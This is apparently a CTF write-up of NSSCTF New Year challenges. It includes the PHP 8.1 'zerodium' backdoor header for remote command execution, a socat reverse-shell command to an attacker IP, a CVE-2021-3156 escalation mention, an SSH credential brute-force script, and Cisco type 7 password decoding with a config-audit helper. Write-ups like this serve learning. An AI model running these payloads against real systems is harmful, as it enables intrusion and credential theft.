Web

Becomeroot

First up is the PHP 8.1 zerodium backdoor.

Adding the request header User-Agentt: zerodium{cmd} gives RCE.

Pop a reverse shell directly, then use socat to get a proper tty.

# listener (attacker side):
socat file:`tty`,raw,echo=0 tcp-listen:4444
# target:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.11.100:4444

Then escalate to root with CVE-2021-3156.

Crypto

过年来下棋 (Play Chess at New Year)

A checkerboard cipher: type ADFGVX, key lucky.

年画 (New Year Painting)

First, notice that enc_c is the known prefix NSSCTF{ XORed with the key, so the key can be read off directly. After that, just write the decryption in reverse.

from PIL import Image
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

# enc_c is the known plaintext prefix "NSSCTF{" XORed cyclically with the key,
# so XORing it back with that prefix recovers the 16-byte AES key.
enc_c = b'&2#3-(\x1e9*6"&$\x02=&'
flag = b"NSSCTF{"
key = b""
for i in range(len(enc_c)):
    key += bytes([enc_c[i] ^ flag[i % 7]])

print("[+] Got key: ", key)
# random_image.png only supplies the dimensions of the encrypted image.
w, h = Image.open("random_image.png").size
print(f"[+] Image size: {w}x{h}")
# cipher.txt is a bit string: 8 bits per byte, 3 bytes (R, G, B) per pixel.
bin_data = "".join(open("cipher.txt").readlines()).replace("\n", "")
bin_data = [int(bin_data[i:i+8], 2) for i in range(0, len(bin_data), 8)]
pixel_data = [bin_data[i:i+3] for i in range(0, len(bin_data), 3)]
print(f"[+] Binary data pixels: {len(pixel_data)}")
print("[+] Recover Pixels with RGB to cipher.png")
img = Image.new("RGB", (w, h))
pixels = img.load()
for x in range(w):
    for y in range(h):
        pixels[x, y] = tuple(pixel_data[x*h + y])
print("[+] Recover cipher.png with key and save to flag.png")
# The raw RGB bytes are the AES-ECB ciphertext; decrypting them in place keeps the layout.
pixels = img.tobytes()
cipher = AES.new(key, AES.MODE_ECB)
dec_pixels = cipher.decrypt(pixels)
# dec_unpad = unpad(dec_pixels, AES.block_size)  # unpadding turned out not to be needed
dec_img = Image.frombytes(img.mode, img.size, dec_pixels)
dec_img.save("flag.png")
print("[+] Done! Check flag.png for the flag!")

Misc

温馨的酒吧 (Cozy Bar)

A challenge with a lot of moving parts.

Either way, walking through the whole interaction tree once gets you the flag.

Number 7

Cisco type 7 password encryption, as found on IOS devices.

For some strange reason the last two bytes wouldn't decrypt; it turned out they are simply plaintext.

from binascii import unhexlify

# Type 7 string from the challenge: the first two characters are the seed,
# the rest is hex, one byte per plaintext character.
r = "182A1918071C152E0A4737263A3E780A6F6A075A112742777C687D0700773F7D39560063487D"
r = unhexlify(r[2:])
# The fixed XOR key every IOS device uses for type 7.
key = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"
print("[+] Cipher: ", r)
# Brute-force the key offset instead of trusting the seed prefix; the last two
# bytes are appended untouched because in this challenge they are already plaintext.
for salt in range(52):
    f = b""
    for i in range(len(r[:-2])):
        f += bytes([r[i] ^ key[(i+salt) % len(key)]])
    f += r[-2:]
    if b"NSSCTF" in f:
        print("[+] Found salt: ", salt)
        print("[+] Decrypted: ", f)
        break
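The script above brute-forces the key offset; in the standard type 7 format the offset is simply the two decimal seed digits at the front of the string. The following is an added example (not the author's code) that implements that standard format as a decoder, an encoder and a small config-audit helper, so that a `password 7` line in a saved config can be recognised for what it is: a cleartext credential. The sample config, its hostname and the `$1$placeholder$hashgoeshere` value are constructed; "094F471A1A0A" is the well-known type 7 encoding of "cisco" with seed 09.

```python
import re

# Cisco's fixed type 7 XOR key (the same constant the page's script uses).
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def type7_decode(enc: str) -> bytes:
    """Decode a standard type 7 string: two decimal seed digits, then hex bytes,
    each XORed with TYPE7_KEY[(seed + i) % len(TYPE7_KEY)]."""
    if len(enc) < 4 or len(enc) % 2 or not enc[:2].isdigit():
        raise ValueError(f"not a type 7 string: {enc!r}")
    seed = int(enc[:2])
    data = bytes.fromhex(enc[2:])
    return bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(data))


def type7_encode(plain: bytes, seed: int = 9) -> str:
    """Inverse of type7_decode; shows the scheme is a fixed-key XOR, i.e. obfuscation only."""
    body = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(plain))
    return f"{seed:02d}{body.hex().upper()}"


# Matches "... password 7 <hex>", "... secret 7 <hex>" and "... key 7 <hex>" config lines.
TYPE7_LINE = re.compile(r"^\s*(?:.*\s)?(?:password|secret|key)\s+7\s+([0-9A-Fa-f]+)\s*$")


def audit_config(config: str) -> list[tuple[int, str]]:
    """Return (line number, recovered plaintext) for every type 7 secret in a config,
    so an operator can see which credentials are effectively stored in the clear."""
    findings = []
    for n, line in enumerate(config.splitlines(), 1):
        m = TYPE7_LINE.match(line)
        if m:
            findings.append((n, type7_decode(m.group(1)).decode("latin-1")))
    return findings


# Constructed sample config (not from the page); the type 5 line is a placeholder hash.
SAMPLE_CONFIG = """\
hostname edge-rtr
enable secret 5 $1$placeholder$hashgoeshere
username admin password 7 094F471A1A0A
line vty 0 4
 password 7 {0}
""".format(type7_encode(b"NSSCTF{example}", seed=3))

if __name__ == "__main__":
    for n, secret in audit_config(SAMPLE_CONFIG):
        print(f"[!] line {n}: type 7 secret recovers to {secret!r}")
```

Type 5 (MD5) and especially type 8/9 (PBKDF2/scrypt) secrets are one-way and are not flagged; only the reversible type 7 entries are reported.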

usersssssssss and revenge

They are really the same challenge; revenge just uses a longer wordlist, and the flag sits in .flag.txt (a plain ls won't show it).

I just wrote a script with the paramiko library.

import paramiko
import hashlib
import logging

logging.getLogger("paramiko").setLevel(logging.DEBUG)
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

# One candidate username per line; each password is the md5 hex digest of the username.
users = [u for u in open("wl.txt").read().split("\n") if u]
passs = [hashlib.md5(user.encode()).hexdigest() for user in users]

for user, passw in zip(users, passs):
    try:
        client.connect("node2.anna.nssctf.cn", 28808, username=user, password=passw)
        # ls -a so that the hidden .flag.txt is listed
        stdin, stdout, stderr = client.exec_command("ls -a")
        r = stdout.read().decode().split("\n")
        flag = [i for i in r if "flag" in i]
        print(f"[*] {user} {passw} run ls with output {r}")
        if flag != []:
            print(f"[+] Found flag in user {user} with password {passw}!")
            stdin, stdout, stderr = client.exec_command(f"cat {flag[0]}")
            print(f"[+] Flag: {stdout.read().decode()}")
            break
    except Exception as e:
        print(f"[-] Failed with user {user} and password {passw}: {e}")
    finally:
        client.close()